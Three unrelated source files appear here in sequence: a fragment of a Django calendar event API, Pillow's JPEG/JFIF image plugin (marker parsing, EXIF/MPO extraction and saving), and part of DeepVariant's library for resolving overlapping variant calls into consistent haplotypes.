response_data['status'] = "OK"
else:
event = Event.objects.get(id=event_id)
dts = 0
dte = delta
if not resize:
event.start += delta
dts = delta
event.end = event.end + delta
if CHECK_EVENT_PERM_FUNC(event, user):
event.save()
event.occurrence_set.all().update(
original_start=F('original_start') + dts,
original_end=F('original_end') + dte,
)
response_data['status'] = "OK"
return response_data
@require_POST
@check_calendar_permissions
def api_select_create(request):
response_data = {}
start = request.POST.get('start')
end = request.POST.get('end')
calendar_slug = request.POST.get('calendar_slug')
response_data = _api_select_create(start, end, calendar_slug)
return JsonResponse(response_data)
def _api_select_create(start, end, calendar_slug):
start = dateutil.parser.parse(start)
end = dateutil.parser.parse(end)
calendar = Calendar.objects.get(slug=calendar_slug)
Event.objects.create(
start=start,
end=end,
title=EVENT_NAME_PLACEHOLDER,
calendar=calendar,
)
response_data = {}
response_data['status'] = "OK"
return response_data
|
|
#
# The Python Imaging Library.
# $Id$
#
# JPEG (JFIF) file handling
#
# See "Digital Compression and Coding of Continuous-Tone Still Images,
# Part 1, Requirements and Guidelines" (CCITT T.81 / ISO 10918-1)
#
# History:
# 1995-09-09 fl Created
# 1995-09-13 fl Added full parser
# 1996-03-25 fl Added hack to use the IJG command line utilities
# 1996-05-05 fl Workaround Photoshop 2.5 CMYK polarity bug
# 1996-05-28 fl Added draft support, JFIF version (0.1)
# 1996-12-30 fl Added encoder options, added progression property (0.2)
# 1997-08-27 fl Save mode 1 images as BW (0.3)
# 1998-07-12 fl Added YCbCr to draft and save methods (0.4)
# 1998-10-19 fl Don't hang on files using 16-bit DQT's (0.4.1)
# 2001-04-16 fl Extract DPI settings from JFIF files (0.4.2)
# 2002-07-01 fl Skip pad bytes before markers; identify Exif files (0.4.3)
# 2003-04-25 fl Added experimental EXIF decoder (0.5)
# 2003-06-06 fl Added experimental EXIF GPSinfo decoder
# 2003-09-13 fl Extract COM markers
# 2009-09-06 fl Added icc_profile support (from Florian Hoech)
# 2009-03-06 fl Changed CMYK handling; always use Adobe polarity (0.6)
# 2009-03-08 fl Added subsampling support (from Justin Huff).
#
# Copyright (c) 1997-2003 by Secret Labs AB.
# Copyright (c) 1995-1996 by Fredrik Lundh.
#
# See the README file for information on usage and redistribution.
#
__version__ = "0.6"
import array
import struct
import io
from struct import unpack
from PIL import Image, ImageFile, TiffImagePlugin, _binary
from PIL.JpegPresets import presets
from PIL._util import isStringType
i8 = _binary.i8
o8 = _binary.o8
i16 = _binary.i16be
i32 = _binary.i32be
#
# Parser
def Skip(self, marker):
n = i16(self.fp.read(2))-2
ImageFile._safe_read(self.fp, n)
def APP(self, marker):
#
# Application marker. Store these in the APP dictionary.
# Also look for well-known application markers.
n = i16(self.fp.read(2))-2
s = ImageFile._safe_read(self.fp, n)
app = "APP%d" % (marker & 15)
self.app[app] = s # compatibility
self.applist.append((app, s))
if marker == 0xFFE0 and s[:4] == b"JFIF":
# extract JFIF information
self.info["jfif"] = version = i16(s, 5) # version
self.info["jfif_version"] = divmod(version, 256)
# extract JFIF properties
try:
jfif_unit = i8(s[7])
jfif_density = i16(s, 8), i16(s, 10)
except:
pass
else:
if jfif_unit == 1:
self.info["dpi"] = jfif_density
self.info["jfif_unit"] = jfif_unit
self.info["jfif_density"] = jfif_density
elif marker == 0xFFE1 and s[:5] == b"Exif\0":
# extract Exif information (incomplete)
self.info["exif"] = s # FIXME: value will change
elif marker == 0xFFE2 and s[:5] == b"FPXR\0":
# extract FlashPix information (incomplete)
self.info["flashpix"] = s # FIXME: value will change
elif marker == 0xFFE2 and s[:12] == b"ICC_PROFILE\0":
# Since an ICC profile can be larger than the maximum size of
# a JPEG marker (64K), we need provisions to split it into
# multiple markers. The format defined by the ICC specifies
# one or more APP2 markers containing the following data:
# Identifying string ASCII "ICC_PROFILE\0" (12 bytes)
# Marker sequence number 1, 2, etc (1 byte)
# Number of markers Total of APP2's used (1 byte)
# Procfile data (remainder of APP2 data)
# Decoders should use the marker sequence numbers to
# reassemble the profile, rather than assuming that the APP2
# markers appear in the correct sequence.
self.icclist.append(s)
elif marker == 0xFFEE and s[:5] == b"Adobe":
self.info["adobe"] = i16(s, 5)
# extract Adobe custom properties
try:
adobe_transform = i8(s[1])
except:
pass
else:
self.info["adobe_transform"] = adobe_transform
elif marker == 0xFFE2 and s[:4] == b"MPF\0":
# extract MPO information
self.info["mp"] = s[4:]
# offset is current location minus buffer size
# plus constant header size
self.info["mpoffset"] = self.fp.tell() - n + 4
def COM(self, marker):
#
# Comment marker. Store these in the APP dictionary.
n = i16(self.fp.read(2))-2
s = ImageFile._safe_read(self.fp, n)
self.app["COM"] = s # compatibility
self.applist.append(("COM", s))
def SOF(self, marker):
#
# Start of frame marker. Defines the size and mode of the
# image. JPEG is colour blind, so we use some simple
# heuristics to map the number of layers to an appropriate
# mode. Note that this could be made a bit brighter, by
# looking for JFIF and Adobe APP markers.
n = i16(self.fp.read(2))-2
s = ImageFile._safe_read(self.fp, n)
self.size = i16(s[3:]), i16(s[1:])
self.bits = i8(s[0])
if self.bits != 8:
raise SyntaxError("cannot handle %d-bit layers" % self.bits)
self.layers = i8(s[5])
if self.layers == 1:
self.mode = "L"
elif self.layers == 3:
self.mode = "RGB"
elif self.layers == 4:
self.mode = "CMYK"
else:
raise SyntaxError("cannot handle %d-layer images" % self.layers)
if marker in [0xFFC2, 0xFFC6, 0xFFCA, 0xFFCE]:
self.info["progressive"] = self.info["progression"] = 1
if self.icclist:
# fixup icc profile
self.icclist.sort() # sort by sequence number
if i8(self.icclist[0][13]) == len(self.icclist):
profile = []
for p in self.icclist:
profile.append(p[14:])
icc_profile = b"".join(profile)
else:
icc_profile = None # wrong number of fragments
self.info["icc_profile"] = icc_profile
self.icclist = None
for i in range(6, len(s), 3):
t = s[i:i+3]
# 4-tuples: id, vsamp, hsamp, qtable
self.layer.append((t[0], i8(t[1])//16, i8(t[1]) & 15, i8(t[2])))
def DQT(self, marker):
#
# Define quantization table. Support baseline 8-bit tables
# only. Note that there might be more than one table in
# each marker.
# FIXME: The quantization tables can be used to estimate the
# compression quality.
n = i16(self.fp.read(2))-2
s = ImageFile._safe_read(self.fp, n)
while len(s):
if len(s) < 65:
raise SyntaxError("bad quantization table marker")
v = i8(s[0])
if v//16 == 0:
self.quantization[v & 15] = array.array("b", s[1:65])
s = s[65:]
else:
return # FIXME: add code to read 16-bit tables!
# raise SyntaxError, "bad quantization table element size"
#
# JPEG marker table
MARKER = {
0xFFC0: ("SOF0", "Baseline DCT", SOF),
0xFFC1: ("SOF1", "Extended Sequential DCT", SOF),
0xFFC2: ("SOF2", "Progressive DCT", SOF),
0xFFC3: ("SOF3", "Spatial lossless", SOF),
0xFFC4: ("DHT", "Define Huffman table", Skip),
0xFFC5: ("SOF5", "Differential sequential DCT", SOF),
0xFFC6: ("SOF6", "Differential progressive DCT", SOF),
0xFFC7: ("SOF7", "Differential spatial", SOF),
0xFFC8: ("JPG", "Extension", None),
0xFFC9: ("SOF9", "Extended sequential DCT (AC)", SOF),
0xFFCA: ("SOF10", "Progressive DCT (AC)", SOF),
0xFFCB: ("SOF11", "Spatial lossless DCT (AC)", SOF),
0xFFCC: ("DAC", "Define arithmetic coding conditioning", Skip),
0xFFCD: ("SOF13", "Differential sequential DCT (AC)", SOF),
0xFFCE: ("SOF14", "Differential progressive DCT (AC)", SOF),
0xFFCF: ("SOF15", "Differential spatial (AC)", SOF),
0xFFD0: ("RST0", "Restart 0", None),
0xFFD1: ("RST1", "Restart 1", None),
0xFFD2: ("RST2", "Restart 2", None),
0xFFD3: ("RST3", "Restart 3", None),
0xFFD4: ("RST4", "Restart 4", None),
0xFFD5: ("RST5", "Restart 5", None),
0xFFD6: ("RST6", "Restart 6", None),
0xFFD7: ("RST7", "Restart 7", None),
0xFFD8: ("SOI", "Start of image", None),
0xFFD9: ("EOI", "End of image", None),
0xFFDA: ("SOS", "Start of scan", Skip),
0xFFDB: ("DQT", "Define quantization table", DQT),
0xFFDC: ("DNL", "Define number of lines", Skip),
0xFFDD: ("DRI", "Define restart interval", Skip),
0xFFDE: ("DHP", "Define hierarchical progression", SOF),
0xFFDF: ("EXP", "Expand reference component", Skip),
0xFFE0: ("APP0", "Application segment 0", APP),
0xFFE1: ("APP1", "Application segment 1", APP),
0xFFE2: ("APP2", "Application segment 2", APP),
0xFFE3: ("APP3", "Application segment 3", APP),
0xFFE4: ("APP4", "Application segment 4", APP),
0xFFE5: ("APP5", "Application segment 5", APP),
0xFFE6: ("APP6", "Application segment 6", APP),
0xFFE7: ("APP7", "Application segment 7", APP),
0xFFE8: ("APP8", "Application segment 8", APP),
0xFFE9: ("APP9", "Application segment 9", APP),
0xFFEA: ("APP10", "Application segment 10", APP),
0xFFEB: ("APP11", "Application segment 11", APP),
0xFFEC: ("APP12", "Application segment 12", APP),
0xFFED: ("APP13", "Application segment 13", APP),
0xFFEE: ("APP14", "Application segment 14", APP),
0xFFEF: ("APP15", "Application segment 15", APP),
0xFFF0: ("JPG0", "Extension 0", None),
0xFFF1: ("JPG1", "Extension 1", None),
0xFFF2: ("JPG2", "Extension 2", None),
0xFFF3: ("JPG3", "Extension 3", None),
0xFFF4: ("JPG4", "Extension 4", None),
0xFFF5: ("JPG5", "Extension 5", None),
0xFFF6: ("JPG6", "Extension 6", None),
0xFFF7: ("JPG7", "Extension 7", None),
0xFFF8: ("JPG8", "Extension 8", None),
0xFFF9: ("JPG9", "Extension 9", None),
0xFFFA: ("JPG10", "Extension 10", None),
0xFFFB: ("JPG11", "Extension 11", None),
0xFFFC: ("JPG12", "Extension 12", None),
0xFFFD: ("JPG13", "Extension 13", None),
0xFFFE: ("COM", "Comment", COM)
}
def _accept(prefix):
return prefix[0:1] == b"\377"
##
# Image plugin for JPEG and JFIF images.
class JpegImageFile(ImageFile.ImageFile):
format = "JPEG"
format_description = "JPEG (ISO 10918)"
def _open(self):
s = self.fp.read(1)
if i8(s[0]) != 255:
raise SyntaxError("not a JPEG file")
# Create attributes
self.bits = self.layers = 0
# JPEG specifics (internal)
self.layer = []
self.huffman_dc = {}
self.huffman_ac = {}
self.quantization = {}
self.app = {} # compatibility
self.applist = []
self.icclist = []
while True:
i = i8(s)
if i == 0xFF:
s = s + self.fp.read(1)
i = i16(s)
else:
# Skip non-0xFF junk
s = b"\xff"
continue
if i in MARKER:
name, description, handler = MARKER[i]
# print hex(i), name, description
if handler is not None:
handler(self, i)
if i == 0xFFDA: # start of scan
rawmode = self.mode
if self.mode == "CMYK":
rawmode = "CMYK;I" # assume adobe conventions
self.tile = [("jpeg", (0, 0) + self.size, 0,
(rawmode, ""))]
# self.__offset = self.fp.tell()
break
s = self.fp.read(1)
elif i == 0 or i == 0xFFFF:
# padded marker or junk; move on
s = b"\xff"
else:
raise SyntaxError("no marker found")
def draft(self, mode, size):
if len(self.tile) != 1:
return
d, e, o, a = self.tile[0]
scale = 0
if a[0] == "RGB" and mode in ["L", "YCbCr"]:
self.mode = mode
a = mode, ""
if size:
scale = max(self.size[0] // size[0], self.size[1] // size[1])
for s in [8, 4, 2, 1]:
if scale >= s:
break
e = e[0], e[1], (e[2]-e[0]+s-1)//s+e[0], (e[3]-e[1]+s-1)//s+e[1]
self.size = ((self.size[0]+s-1)//s, (self.size[1]+s-1)//s)
scale = s
self.tile = [(d, e, o, a)]
self.decoderconfig = (scale, 0)
return self
def load_djpeg(self):
# ALTERNATIVE: handle JPEGs via the IJG command line utilities
import subprocess
import tempfile
import os
f, path = tempfile.mkstemp()
os.close(f)
if os.path.exists(self.filename):
subprocess.check_call(["djpeg", "-outfile", path, self.filename])
else:
raise ValueError("Invalid Filename")
try:
self.im = Image.core.open_ppm(path)
finally:
try:
os.unlink(path)
except:
pass
self.mode = self.im.mode
self.size = self.im.size
self.tile = []
def _getexif(self):
return _getexif(self)
def _getmp(self):
return _getmp(self)
def _fixup(value):
# Helper function for _getexif() and _getmp()
if len(value) == 1:
return value[0]
return value
def _getexif(self):
# Extract EXIF information. This method is highly experimental,
# and is likely to be replaced with something better in a future
# version.
# The EXIF record consists of a TIFF file embedded in a JPEG
# application marker (!).
try:
data = self.info["exif"]
except KeyError:
return None
file = io.BytesIO(data[6:])
head = file.read(8)
exif = {}
# process dictionary
info = TiffImagePlugin.ImageFileDirectory(head)
info.load(file)
for key, value in info.items():
exif[key] = _fixup(value)
# get exif extension
try:
file.seek(exif[0x8769])
except KeyError:
pass
else:
info = TiffImagePlugin.ImageFileDirectory(head)
info.load(file)
for key, value in info.items():
exif[key] = _fixup(value)
# get gpsinfo extension
try:
file.seek(exif[0x8825])
except KeyError:
pass
else:
info = TiffImagePlugin.ImageFileDirectory(head)
info.load(file)
exif[0x8825] = gps = {}
for key, value in info.items():
gps[key] = _fixup(value)
return exif
def _getmp(self):
# Extract MP information. This method was inspired by the "highly
# experimental" _getexif version that's been in use for years now,
# itself based on the ImageFileDirectory class in the TIFF plug-in.
# The MP record essentially consists of a TIFF file embedded in a JPEG
# application marker.
try:
data = self.info["mp"]
except KeyError:
return None
file_contents = io.BytesIO(data)
head = file_contents.read(8)
endianness = '>' if head[:4] == b'\x4d\x4d\x00\x2a' else '<'
mp = {}
# process dictionary
info = TiffImagePlugin.ImageFileDirectory(head)
info.load(file_contents)
for key, value in info.items():
mp[key] = _fixup(value)
# it's an error not to have a number of images
try:
quant = mp[0xB001]
except KeyError:
raise SyntaxError("malformed MP Index (no number of images)")
# get MP entries
try:
mpentries = []
for entrynum in range(0, quant):
rawmpentry = mp[0xB002][entrynum * 16:(entrynum + 1) * 16]
unpackedentry = unpack('{0}LLLHH'.format(endianness), rawmpentry)
labels = ('Attribute', 'Size', 'DataOffset', 'EntryNo1',
'EntryNo2')
mpentry = dict(zip(labels, unpackedentry))
mpentryattr = {
'DependentParentImageFlag': bool(mpentry['Attribute'] &
(1 << 31)),
'DependentChildImageFlag': bool(mpentry['Attribute'] &
(1 << 30)),
'RepresentativeImageFlag': bool(mpentry['Attribute'] &
(1 << 29)),
'Reserved': (mpentry['Attribute'] & (3 << 27)) >> 27,
'ImageDataFormat': (mpentry['Attribute'] & (7 << 24)) >> 24,
'MPType': mpentry['Attribute'] & 0x00FFFFFF
}
if mpentryattr['ImageDataFormat'] == 0:
mpentryattr['ImageDataFormat'] = 'JPEG'
else:
raise SyntaxError("unsupported picture format in MPO")
mptypemap = {
0x000000: 'Undefined',
0x010001: 'Large Thumbnail (VGA Equivalent)',
0x010002: 'Large Thumbnail (Full HD Equivalent)',
0x020001: 'Multi-Frame Image (Panorama)',
0x020002: 'Multi-Frame Image: (Disparity)',
0x020003: 'Multi-Frame Image: (Multi-Angle)',
0x030000: 'Baseline MP Primary Image'
}
mpentryattr['MPType'] = mptypemap.get(mpentryattr['MPType'],
'Unknown')
mpentry['Attribute'] = mpentryattr
mpentries.append(mpentry)
mp[0xB002] = mpentries
except KeyError:
raise SyntaxError("malformed MP Index (bad MP Entry)")
# Next we should try and parse the individual image unique ID list;
# we don't because I've never seen this actually used in a real MPO
# file and so can't test it.
return mp
# --------------------------------------------------------------------
# stuff to save JPEG files
RAWMODE = {
"1": "L",
"L": "L",
"RGB": "RGB",
"RGBA": "RGB",
"RGBX": "RGB",
"CMYK": "CMYK;I", # assume adobe conventions
"YCbCr": "YCbCr",
}
zigzag_index = ( 0, 1, 5, 6, 14, 15, 27, 28,
2, 4, 7, 13, 16, 26, 29, 42,
3, 8, 12, 17, 25, 30, 41, 43,
9, 11, 18, 24, 31, 40, 44, 53,
10, 19, 23, 32, 39, 45, 52, 54,
20, 22, 33, 38, 46, 51, 55, 60,
21, 34, 37, 47, 50, 56, 59, 61,
35, 36, 48, 49, 57, 58, 62, 63)
samplings = {(1, 1, 1, 1, 1, 1): 0,
(2, 1, 1, 1, 1, 1): 1,
(2, 2, 1, 1, 1, 1): 2,
}
def convert_dict_qtables(qtables):
qtables = [qtables[key] for key in range(len(qtables)) if key in qtables]
for idx, table in enumerate(qtables):
qtables[idx] = [table[i] for i in zigzag_index]
return qtables
def get_sampling(im):
# There's no subsampling when image have only 1 layer
# (grayscale images) or when they are CMYK (4 layers),
# so set subsampling to default value.
#
# NOTE: currently Pillow can't encode JPEG to YCCK format.
# If YCCK support is added in the future, subsampling code will have
# to be updated (here and in JpegEncode.c) to deal with 4 layers.
if not hasattr(im, 'layers') or im.layers in (1, 4):
return -1
sampling = im.layer[0][1:3] + im.layer[1][1:3] + im.layer[2][1:3]
return samplings.get(sampling, -1)
def _save(im, fp, filename):
try:
rawmode = RAWMODE[im.mode]
except KeyError:
raise IOError("cannot write mode %s as JPEG" % im.mode)
info = im.encoderinfo
dpi = info.get("dpi", (0, 0))
quality = info.get("quality", 0)
subsampling = info.get("subsampling", -1)
qtables = info.get("qtables")
if quality == "keep":
quality = 0
subsampling = "keep"
qtables = "keep"
elif quality in presets:
preset = presets[quality]
quality = 0
subsampling = preset.get('subsampling', -1)
qtables = preset.get('quantization')
elif not isinstance(quality, int):
raise ValueError("Invalid quality setting")
else:
if subsampling in presets:
subsampling = presets[subsampling].get('subsampling', -1)
if isStringType(qtables) and qtables in presets:
qtables = presets[qtables].get('quantization')
if subsampling == "4:4:4":
subsampling = 0
elif subsampling == "4:2:2":
subsampling = 1
elif subsampling == "4:1:1":
subsampling = 2
elif subsampling == "keep":
if im.format != "JPEG":
raise ValueError(
"Cannot use 'keep' when original image is not a JPEG")
subsampling = get_sampling(im)
def validate_qtables(qtables):
if qtables is None:
return qtables
if isStringType(qtables):
try:
lines = [int(num) for line in qtables.splitlines()
for num in line.split('#', 1)[0].split()]
except ValueError:
raise ValueError("Invalid quantization table")
else:
qtables = [lines[s:s+64] for s in range(0, len(lines), 64)]
if isinstance(qtables, (tuple, list, dict)):
if isinstance(qtables, dict):
qtables = convert_dict_qtables(qtables)
elif isinstance(qtables, tuple):
qtables = list(qtables)
if not (0 < len(qtables) < 5):
raise ValueError("None or too many quantization tables")
for idx, table in enumerate(qtables):
try:
if len(table) != 64:
raise
table = array.array('b', table)
except TypeError:
raise ValueError("Invalid quantization table")
else:
qtables[idx] = list(table)
return qtables
if qtables == "keep":
if im.format != "JPEG":
raise ValueError(
"Cannot use 'keep' when original image is not a JPEG")
qtables = getattr(im, "quantization", None)
qtables = validate_qtables(qtables)
extra = b""
icc_profile = info.get("icc_profile")
if icc_profile:
ICC_OVERHEAD_LEN = 14
MAX_BYTES_IN_MARKER = 65533
MAX_DATA_BYTES_IN_MARKER = MAX_BYTES_IN_MARKER - ICC_OVERHEAD_LEN
markers = []
while icc_profile:
markers.append(icc_profile[:MAX_DATA_BYTES_IN_MARKER])
icc_profile = icc_profile[MAX_DATA_BYTES_IN_MARKER:]
i = 1
for marker in markers:
size = struct.pack(">H", 2 + ICC_OVERHEAD_LEN + len(marker))
extra += (b"\xFF\xE2" + size + b"ICC_PROFILE\0" + o8(i) +
o8(len(markers)) + marker)
i += 1
# get keyword arguments
im.encoderconfig = (
quality,
# "progressive" is the official name, but older documentation
# says "progression"
# FIXME: issue a warning if the wrong form is used (post-1.1.7)
"progressive" in info or "progression" in info,
info.get("smooth", 0),
"optimize" in info,
info.get("streamtype", 0),
dpi[0], dpi[1],
subsampling,
qtables,
extra,
info.get("exif", b"")
)
# if we optimize, libjpeg needs a buffer big enough to hold the whole image
# in a shot. Guessing on the size, at im.size bytes. (raw pizel size is
# channels*size, this is a value that's been used in a django patch.
# https://github.com/jdriscoll/django-imagekit/issues/50
bufsize = 0
if "optimize" in info or "progressive" in info or "progression" in info:
# keep sets quality to 0, but the actual value may be high.
if quality >= 95 or quality == 0:
bufsize = 2 * im.size[0] * im.size[1]
else:
bufsize = im.size[0] * im.size[1]
# The exif info needs to be written as one block, + APP1, + one spare byte.
# Ensure that our buffer is big enough
bufsize = max(ImageFile.MAXBLOCK, bufsize, len(info.get("exif", b"")) + 5)
ImageFile._save(im, fp, [("jpeg", (0, 0)+im.size, 0, rawmode)], bufsize)
def _save_cjpeg(im, fp, filename):
# ALTERNATIVE: handle JPEGs via the IJG command line utilities.
import os
import subprocess
tempfile = im._dump()
subprocess.check_call(["cjpeg", "-outfile", filename, tempfile])
try:
os.unlink(tempfile)
except:
pass
##
# Factory for making JPEG and MPO instances
def jpeg_factory(fp=None, filename=None):
im = JpegImageFile(fp, filename)
mpheader = im._getmp()
try:
if mpheader[45057] > 1:
# It's actually an MPO
from .MpoImagePlugin import MpoImageFile
im = MpoImageFile(fp, filename)
except (TypeError, IndexError):
# It is really a JPEG
pass
return im
# -------------------------------------------------------------------q-
# Registry stuff
Image.register_open("JPEG", jpeg_factory, _accept)
Image.register_save("JPEG", _save)
Image.register_extension("JPEG", ".jfif")
Image.register_extension("JPEG", ".jpe")
Image.register_extension("JPEG", ".jpg")
Image.register_extension("JPEG", ".jpeg")
Image.register_mime("JPEG", "image/jpeg")
|
|
# Copyright 2017 Google LLC.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Library for resolving variants into consistent haplotypes.
The convolutional neural network that evaluates the probability of a candidate
variant being non-reference evaluates each candidate variant independently.
This can lead to overlapping variant calls that cannot actually exist in an
organism: for example, a diploid human cannot have overlapping variants for
which one is homozygous alternate and the other is heterozygous alternate, since
that implies three total alternate alleles.
This library tries to resolve overlapping variant calls into consistent
haplotypes by using the most likely configuration based on individual call
probabilities that is a valid set of two haplotypes. In rare cases where this
is not possible, the haplotypes are left unmodified.
"""
import copy
import itertools
from absl import flags
from absl import logging
import numpy as np
from third_party.nucleus.util import genomics_math
from third_party.nucleus.util import variant_utils
FLAGS = flags.FLAGS
flags.DEFINE_bool(
'disable_haplotype_resolution', False,
'If True, makes `maybe_resolve_conflicting_variants` a no-op.')
# The maximum number of overlapping variants to try to resolve into compatible
# haplotypes. This corresponds to generating 3^12 (= 531,441) possible variant
# configurations for diploid individuals.
_MAX_OVERLAPPING_VARIANTS_TO_RESOLVE = 12
def maybe_resolve_conflicting_variants(sorted_variants):
"""Yields Variant protos in sorted order after fixing conflicting haplotypes.
The input is an iterable of Variants in chromosome and position sorted order,
with potential incompatibilies as described in this module's docstring. This
function tries to resolve variants into valid haplotypes, though is not
guaranteed to do so if the variant composition is not amenable to this or it
would be computationally intractable.
Args:
sorted_variants: Iterable of Variant protos. Sorted in coordinate order, but
with potentially incompatible haplotypes.
Yields:
Variant protos in coordinate-sorted order with no incompatible haplotypes.
"""
if FLAGS.disable_haplotype_resolution:
logging.info('disable_haplotype_resolution is True. '
'`maybe_resolve_conflicting_variants` has no effect.')
for v in sorted_variants:
yield v
else:
for overlapping_candidates in _group_overlapping_variants(sorted_variants):
for resolved_candidate in _maybe_resolve_mixed_calls(
overlapping_candidates):
yield resolved_candidate
def _group_overlapping_variants(sorted_variants):
"""Yields lists of Variant protos that overlap on the reference sequence.
Args:
sorted_variants: Iterable of Variant protos, sorted in coordinate order.
Yields:
Lists of variants within `sorted_variants` that overlap with each other on
the reference sequence.
"""
curr_variants = []
prev_chrom = None
prev_max_end = -1
for variant in sorted_variants:
if variant.reference_name != prev_chrom or variant.start >= prev_max_end:
if curr_variants:
yield curr_variants
curr_variants = [variant]
prev_chrom = variant.reference_name
prev_max_end = variant.end
else:
curr_variants.append(variant)
prev_max_end = max(prev_max_end, variant.end)
# Fencepost.
if curr_variants:
yield curr_variants
def _maybe_resolve_mixed_calls(overlapping_candidates):
"""Yields variants with compatible genotype calls in order.
This function differs from `_resolve_overlapping_variants` below in that the
input here is a block of all candidate calls that overlap in a region, which
may contain candidates that are deemed to be most likely reference calls.
We often tune DeepVariant to be highly sensitive. Consequently, there can be
many candidate calls that are predicted as reference. Since those do not
contribute to potential incompatibilities, we split them out from variants
predicted to contain non-reference genotypes since the computation of
compatible haplotypes is exponential in the number of inputs.
Args:
overlapping_candidates: list(Variant). A non-empty list of Variant protos in
coordinate-sorted order that overlap on the reference genome.
Yields:
Variant protos in coordinate-sorted order that try to resolve incompatible
haplotypes.
"""
# Short circuit the simplest case: A single variant in a region is compatible
# with itself by definition.
if len(overlapping_candidates) == 1:
yield overlapping_candidates[0]
return
def has_variation(candidate):
return _nonref_genotype_count(candidate) > 0
reference_calls = [c for c in overlapping_candidates if not has_variation(c)]
variant_calls = [v for v in overlapping_candidates if has_variation(v)]
resolved_variant_calls = []
for variant_group in _group_overlapping_variants(variant_calls):
resolved_variant_calls.extend(_resolve_overlapping_variants(variant_group))
# Merge the reference and resolved variants back together in sorted order.
# Note: This could be done in an interleaving fashion, but since the total
# number of variants in the input is nearly always < 20 this is not an issue.
for variant in sorted(
reference_calls + resolved_variant_calls,
key=variant_utils.variant_range_tuple):
yield variant
class _VariantCompatibilityCalculator(object):
"""Represents the reference genome spanned by overlapping Variants.
Each Variant affects a portion of the reference genome that is determined by
its start and end coordinates. For a given set of Variants, they are deemed
compatible if the total area along the reference genome that is called as
non-reference genotypes never exceeds the ploidy of the organism.
"""
def __init__(self, overlapping_variants):
"""Constructor.
Args:
overlapping_variants: list(Variant). The Variant protos of interest.
"""
min_start = min(v.start for v in overlapping_variants)
self.variant_indices = [
(v.start - min_start, v.end - min_start) for v in overlapping_variants
]
self.size = max(v.end - min_start for v in overlapping_variants)
def all_variants_compatible(self, nonref_genotype_counts, ploidy=2):
"""Returns True if and only if all variants are compatible.
Args:
nonref_genotype_counts: list of ints in [0, ploidy]. Element i in this
list represents the number of non-reference genotypes for the i'th
variant.
ploidy: int. The ploidy of the individual.
Returns:
True if and only if the variants are compatible.
Raises:
ValueError: nonref_genotype_counts is not the same length as
self.variant_indices.
ValueError: nonref_genotype_counts does not contain elements in [0,
ploidy].
"""
if len(nonref_genotype_counts) != len(self.variant_indices):
raise ValueError(
'Variant counts must have same length as variant indices.')
if not all(0 <= cnt <= ploidy for cnt in nonref_genotype_counts):
raise ValueError('Invalid variant allele count for ploidy {}: {}'.format(
ploidy, nonref_genotype_counts))
alts_in_span = np.zeros(self.size, dtype=int)
for cnt, (start, end) in zip(nonref_genotype_counts, self.variant_indices):
alts_in_span[start:end] += cnt
return np.all(alts_in_span <= ploidy)
class _LikelihoodAggregator(object):
"""Container class for genotype likelihoods of allele configurations.
When evaluating valid genotype configurations across multiple variants, we
calculate the likelihood of each configuration. To then calculate the marginal
likelihoods for each variant's genotypes, for each genotype we need to sum the
probabilities of all configurations that include that genotype.
For numerical stability we do this by storing the genotype likelihoods
= log10(p) and then aggregate using the log-sum-exp trick.
"""
def __init__(self, num_alts):
"""Constructor.
Args:
num_alts: int. The number of alternate alleles in the variant.
"""
self._num_likelihoods = variant_utils.genotype_likelihood_index(
(num_alts, num_alts)) + 1
# At each GL index, we keep a list that will include the joint GL across all
# variants that include that particular set of allele indices for this
# variant.
self._genotype_likelihood_containers = []
for _ in range(self._num_likelihoods):
self._genotype_likelihood_containers.append([])
def add(self, allele_indices, likelihood):
"""Add some likelihood to a particular allele configuration.
Args:
allele_indices: Pair of (g1, g2) ints representing the genotype.
likelihood: float. log10(probability of this genotype configuration).
"""
ix = variant_utils.genotype_likelihood_index(allele_indices)
self._genotype_likelihood_containers[ix].append(likelihood)
def scaled_likelihoods(self):
"""Returns the scaled likelihood of each genotype."""
if not all(bool(x) for x in self._genotype_likelihood_containers):
raise ValueError(
'All genotypes must have some probability mass: {}'.format(
self._genotype_likelihood_containers))
return genomics_math.normalize_log10_probs([
genomics_math.log10sumexp(unscaled)
for unscaled in self._genotype_likelihood_containers
])
def most_likely_allele_indices(self):
"""Returns allele indices for the genotype with the largest likelihood."""
ix = np.argmax(self.scaled_likelihoods())
return variant_utils.allele_indices_for_genotype_likelihood_index(
ix, ploidy=2)
def _resolve_overlapping_variants(overlapping_variants):
"""Yields variants with compatible haplotypes, if possible.
Args:
overlapping_variants: list(Variant). A non-empty list of Variant protos in
coordinate-sorted order that overlap on the reference genome and are
predicted to contain alternate allele genotypes.
Yields:
Variant protos in coordinate-sorted order that try to resolve incompatible
haplotypes.
"""
# Short circuit the simplest case: A single variant in a region is compatible
# with itself by definition.
if len(overlapping_variants) == 1:
yield overlapping_variants[0]
return
# If the actual genotype calls are compatible, we can safely return those
# since they would be the most likely configuration also when restricting to
# only valid configurations of genotype calls.
calculator = _VariantCompatibilityCalculator(overlapping_variants)
nonref_counts = [_nonref_genotype_count(v) for v in overlapping_variants]
if calculator.all_variants_compatible(nonref_counts):
logging.vlog(2, 'Overlapping variants are naturally compatible: %s',
overlapping_variants)
